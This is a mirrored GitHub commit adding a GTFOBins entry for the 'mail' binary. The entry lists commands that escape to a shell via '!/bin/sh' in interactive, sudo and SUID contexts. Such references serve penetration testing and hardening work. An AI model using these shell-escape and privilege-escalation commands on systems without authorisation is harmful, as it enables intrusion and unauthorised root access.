mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Add mail
This commit is contained in:
parent
5e0da38a4a
commit
4fbd4d3ab7
15
_gtfobins/mail.md
Normal file
15
_gtfobins/mail.md
Normal file
@ -0,0 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
mail -f /etc/hosts
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo mail -f /etc/hosts
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |-
|
||||
./mail -f /etc/hosts
|
||||
!/bin/sh
|
||||
---
|
Loading…
Reference in New Issue
Block a user